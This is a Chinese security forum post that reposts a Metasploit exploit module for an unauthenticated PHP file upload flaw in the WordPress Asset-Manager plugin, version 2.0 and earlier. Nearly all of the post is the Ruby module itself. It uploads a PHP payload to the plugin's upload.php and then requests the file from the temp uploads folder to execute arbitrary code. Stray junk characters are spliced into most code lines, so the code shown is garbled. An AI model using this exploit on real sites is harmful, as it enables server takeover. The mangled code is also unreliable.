找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2111|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。3 O, I2 X$ q1 \& f, w0 j

' F1 v3 q- h+ O/ j( R5 ?##
* {6 B7 j2 I4 r- ]5 Y) F5 i# This file is part of the Metasploit Framework and may be subject to2 c1 u; r, B0 m3 p2 E6 K' U$ V
# redistribution and commercial restrictions. Please see the Metasploit
  h/ o  a0 w: B5 T3 a! s. o# T# Framework web site for more information on licensing and terms of use.
3 B' X+ D5 {( e5 |( }: F) @#   http://metasploit.com/framework/
$ z- C% H. H  X0 \2 X/ Z6 V% l- R##
2 f6 e! a' x  `4 @; X5 r
' I: H; k% J+ ?) qrequire 'msf/core'
1 p* N& Z' O1 u: C% c8 T+ @require 'msf/core/exploit/php_exe'
, [. O4 m) m4 W/ G% r0 S7 [9 c8 w
; E2 r' h$ H2 H: vclass Metasploit3 < Msf::Exploit::Remote
5 y/ _9 R. y' ], |/ j  Rank = ExcellentRanking
! B8 O7 e  Z9 I5 e$ V ; Z0 A+ A' Y' K( K. Z$ P' ~1 B
  include Msf::Exploit::Remote::HttpClient% ^0 y: a4 O- J% M4 K8 [
  include Msf::Exploit:hpEXE, s9 q; Z( w. ^- I
6 `% i# k6 r- z# M6 `- G. F( i+ t
  def initialize(info = {})/ U; p* ^: B' s& {& f: H3 B
    super(update_info(info,, ^  z1 A( e( K/ D5 F  G
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
% g, E7 e, \2 R! |& I) v      'Description'    => %q{, x+ F. O8 M  @, s! q0 H; T8 |
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
6 @4 e- s8 B9 e5 e( z: t# p        plugin.  By abusing the upload.php file, a malicious user can upload a file to a% _: k  S: R( g! c% o
        temp directory without authentication, which results in arbitrary code execution.
1 ]% L) z; m- Y+ Z8 @% `1 h! ^8 e      },4 x( D, Y: J* Q  G/ ~$ i( S
      'Author'         =>
2 g+ z5 a( G$ H+ c        [
% S9 s- a+ X; f" E% r; f          'Sammy FORGIT', # initial discovery% l8 V  S8 r" V. K' u5 _
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
+ m7 Z& y  Z! Q- u: E: a; }, b        ],
" p  G( N: h" Z8 L8 C7 r. C! H      'License'        => MSF_LICENSE,9 o6 t% n2 Q: ?, M" z2 o* l) f
      'References'     =>
0 _5 T  p. w5 W$ Q: `7 [        [2 {$ F3 d5 ]& s# Q5 }
          [ 'OSVDB', '82653' ],7 q' j  G( S# F
          [ 'BID', '53809' ],$ H9 g+ t0 m3 `( `
          [ 'EDB', '18993' ],
; w7 i9 Q# A1 Q7 V          [ 'URL', 'http:// www.myhack58.com /' ]% {( D4 w) x6 x  G
        ],
9 M) M8 i( Y' D" }      'Payload'       =>
% l; W) W0 A# h! {( P- U" M        {
( {  B# |6 N' Y. {$ R; A+ Z          'BadChars' => "\x00",# F9 V' B) Q% S" R" P) [
        },% W3 L$ a5 c+ f1 [
      'Platform'       => 'php',
  ]1 l- D; l  y8 l& ~      'Arch'           => ARCH_PHP,
9 s6 W7 k: \! K# i" ~" N      'Targets'        =>
0 I- p, D# X/ c3 r6 P' X        [  B( l/ Q4 h+ K- J) u" G
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],3 _* }. w( j- O& j0 G" V
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]6 Y; k& k" [" W5 V, d% r
        ],8 }8 V( ?- [, \/ h5 _. |" R* I6 {
      'DefaultTarget' => 0,
% X& P) [  J4 D      'DisclosureDate' => 'May 26 2012'))# N; K& E0 b% f% ~: P' B

/ ?" ~# z( x1 T. r# j: j0 n    register_options(  k- Y2 I, c* W6 ^: X. ], A
      [
9 p5 n% T$ l* W0 [" G$ v        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
, O+ t: J6 s( `" R. _' z      ], self.class)
7 D* K* a5 {+ C  end; ?+ D2 Y1 o1 e- ~/ R1 ^

- f* ?, a  c' K( L) d  def exploit0 q6 C% J8 \$ F/ I
    uri =  target_uri.path! K# J" ^& b" ]3 k/ W$ M
    uri << '/' if uri[-1,1] != '/'
' B0 f; l& U# [& w    peer = "#{rhost}:#{rport}", D7 m8 w. s1 f7 l" _0 ^" ]
    payload_name = "#{rand_text_alpha(5)}.php"
" G3 K: I& z1 H- _# J% M8 h    php_payload = get_write_exec_payload(:unlink_self=>true): |9 D) f; S. `' e/ t1 h  ?) ?
( z% D& ?0 y. M5 d" d! g% V8 M& `; S
    data = Rex::MIME::Message.new0 H  ^2 B& B; X
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")4 J/ a" w7 X: ^# n
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- n. e/ \7 ?: _, q. T; w

- e* n5 C1 d* o! K    print_status("#{peer} - Uploading payload #{payload_name}")& ]+ [/ W6 E/ C* c! W
    res = send_request_cgi({
" R- W. r+ J- X      'method'  => 'POST',
4 q* y) C- U2 \/ ?' Z7 \      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
9 y* F/ M& f' x' n% ]* P      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
4 ^4 s% R# ~0 ~; n      'data'    => post_data" l1 j: I1 r, @+ j3 \/ e0 _
    })
9 [4 Q# J9 F# U! P. h! T
$ F7 ]. w/ a' W4 r) {! l    if not res or res.code != 200 or res.body !~ /#{payload_name}/. f4 y1 m* X1 ^/ w5 {  t, Z
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
' @) |0 S' ]: g3 V! m- ?# vend' d5 s. L# H, |# |; B5 D

$ ~- |3 w/ o$ O) J3 F    print_status("#{peer} - Executing payload #{payload_name}")
9 M  [0 p3 G. x' D; O+ W    res = send_request_raw({
: N: n$ @. `8 O0 L4 Y/ W( n( m      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
8 H; p3 O# z$ s# r      'method'  => 'GET'/ G# w7 L! s- \
    })
6 v2 C3 Z2 {1 h4 S: c0 ^' P * Q' @( ?' }/ X+ i, N7 D6 v
    if res and res.code != 200
8 T2 a+ w8 m/ g, g" ]      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
9 u# R" i' q9 D    end1 X  y& ?7 {. A2 l( q
  end
# z2 C1 |: W  nend
1 f; \  N' J8 f0 @! m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表